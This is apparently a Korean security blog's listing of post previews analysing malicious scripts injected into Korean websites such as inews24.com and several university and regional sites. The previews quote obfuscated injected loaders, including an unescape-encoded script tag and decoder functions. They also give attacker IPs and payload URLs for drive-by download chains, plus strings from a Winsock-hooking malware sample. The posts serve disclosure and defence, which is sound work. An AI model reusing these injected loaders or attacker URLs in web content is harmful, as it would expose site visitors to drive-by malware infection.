본문 바로가기

security/악성코드 유포

이제는 지친다! inews24.com 악성코드 유포지 총 정리!! 이제는 지친다!!! inews24.com 에서 유포중이다!주말마다 관리자는 무엇을 하고있을까?? 내부 소스에는 이와같이 스페이스와 탭으로 이루어진! 스크립트가 삽입! document.write(unescape("%3Cscript%20src%3Dhttp%3A%2F%2F205%2E164%2E5%2E190%2Fpic%2Fimg%2Ejs%3E%3C%2Fscript%3E")); -------------------------------------------------------------------------------------------- ~>http://205.164.5.190/pic/img.html (Yszz 1.3 vip) ~>http://205.164.5.190/pic/swfobject.js ~>http.. 더보기
m914.txt 악성코드 내에 일부분! Agent.aye V3LTray.exe nsavsvc.npc ws2_32.dll WSCEnumProtocols % w s o v e r % w s W i n S o c k e t A . d l l WSCWriteProviderOrder WSCInstallProvider WSCGetProviderPath ole32.dll CoCreateGuid SHLWAPI.dll StrStrIW WSCDeinstallProvider SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\ LoadAppInit_DLLs W i n S o c k e t A %s.%s.tmp \WindowsEx.dll \WinSocketA.dll \lpk.dll shlwapi.dll PathFileEx.. 더보기
http://www.inews24.com 악성코드 유포중 ! * 현재 감염된 사이트 입니다. 접속시에 감염이 될 수 있으니 유의하시기 바랍니다! 근원지 : http://www.inews24.com 내 스크립트 ! 1차 연결 : http://69.46.86.221/pic/img.js 2차 아이프레임 : http://69.46.86.221/pic/img.js~> http://69.46.86.221/pic/img.html (404 Not Found)~> http://69.46.86.221/pic/css.html (익스플로릿 미삽입) [inews24 내 스크립트] function RDfADFLDEXDFu5(s) {var r = new Array();var curr = 0;while(s.charAt(curr) != '\n') {var tmp = 0;for (var i=6;.. 더보기
인제대학교 일어일문학과 http://homepage.inje.ac.kr/~japan/xe/index.php?mid=main 악성 코드 유포중 ! 유포 링크 : http://homepage.inje.ac.kr/~japan/xe/index.php?mid=main 메인 스크립트 ! ---------------------------------------------------------------------------------------------- 디코딩을 위한 변형 ! 디코딩 후 ! 현재 서버는 죽어있는 상태입니다! =========================Server IP(s):0.0.0.0========================= 소스 확인 : view-source:http://homepage.inje.ac.kr/~japan/xe/index.php?mid=main (구글크롬) 바이러스 토탈 : https://www.virustotal.co.. 더보기
[JS/Obfuscated.HN] http://insaweb9.cafe24.com/bbs/login.php?id=best 악성 스크립트 유포 정리 ! 발견 위치 : hxxp://insaweb9.cafe24.com/bbs/login.php?id=best [악성 스크립트] function c102916999516m4943389011261(m4943389011648) { function m4943389011a31() { var m4943389011e19=16; return m4943389011e19; } return (parseInt(m4943389011648,m4943389011a31())); } function m49433890125ea(m49433890129d2) { var m4943389013589=2; var m4943389012dba=''; m4943389014143=String.fromCharCode; for(m49433890131a2=0;m4.. 더보기
악성코드 유포중에 있는 inews24.com 악성 스크립트 정리 ! 최초 감염 페이지 : http://inews24.cox/js_lib/slide_new.js http://lzxvx.com/pix/rot.html http://lzxvx.com/pix/ll.html ~>최종 파일 : http://oppo.ltevc.com/csx/8191i.css ~> ~> 최종파일 : http://oppo.ltevc.com/csx/8191i.css ~> ~> 최종파일 : http://oppo.ltevc.com/csx/8191i.css http://lzxvx.com/pix/swfobject.js http://lzxvx.com/pix/jpg.js var Yszz1="%59"+"%73"+"%7A"+"%7A"+"%30"+"%30";var Yszz2="%78"+"%78"+"%6F"+"%6F"+"%.. 더보기
inews24.com 내에 공백을 이용한 악성 스크립트 살펴보기 ! * 감염 페이지 : http://inews24.com/js_lib/slide_new.js* 위 사이트 접속시 악성코드에 감염 될 수 있음을 알려드립니다! 원본 링크 ! 이처럼 공백이 생겨 있습니다 ! HEX 값 2220200909200909202009202020202020090909202020202009200920202009202009202020090920092020200920202009202020092009090920092020200920202009202020202020090920092020092009092020202009200909202009092009200920092009090920202009200920202009202020092020090920092020202009092020202009090920.. 더보기
오랜만에 풀어본 난독화 스크립트! 감염 사이트 : http://211.239.162.41/~dongposarang/killer.html * 악성 링크이니 조심하시기 바랍니다! Click [복호화] 26.30.400.555.198.351.436.505.220.348.184.595.228.315.464.505.80.117.240.525.204.342.388. 545.202 .96.460.570.198.183.136.520.232.348.448.290.94.141.416.505.198.342.404.570.242.138.456.585.94.297. 444.585.220.348.196.245.92.336.416.560.68.96.440.485.218.303.244.170.168.357.420.580.232.303.456. [생략]. 342.40.. 더보기
Hex 코드로 위장하여 악성 Iframe이 삽입된 http://www.jeonju1318.or.kr 감염 사이트 : http://www.jeonju1318.or.kr * 위 사이트는 현재도 감염중에 있습니다! http://www.jeonju1318.or.kr/root/index.php 안에 현재 악성 스크립트가 존재하여서 글을 써 봅니다! 현재 감염된 페이니 내에 ! 이렇게 Hex 코드로 위장하여 Iframe이 삽입되었습니다! src=http://apple.chol.(중략);l width=2 height=2> 더보기
악성 스크립트 새로운 암호화 방식 ?? 우연히 들어온 사이트중... 하나 스크립트중 신기한게 있어서 써본다..... 나도 어떻게 해결하는 방법인지는 아직 찾지 못하고 있다...... 어떻게 하는거지?? 나도 잘 모르겠다.... 원본 Script 0500520581041161161120580470470540490460500530490460490560550460490550540471071 14047102105108101115047109122046106112103 해독시 ! http://61.251.187.176/kr/files/mz.jpg ~> 현재 접속 불가 ! 참고한 블로그 : http://jjoon.net/tc/343 Decode 참고 사이트 : http://119.194.217.188:8080/Honeypot/ 해결법이 있네요 : ) 참조.. 더보기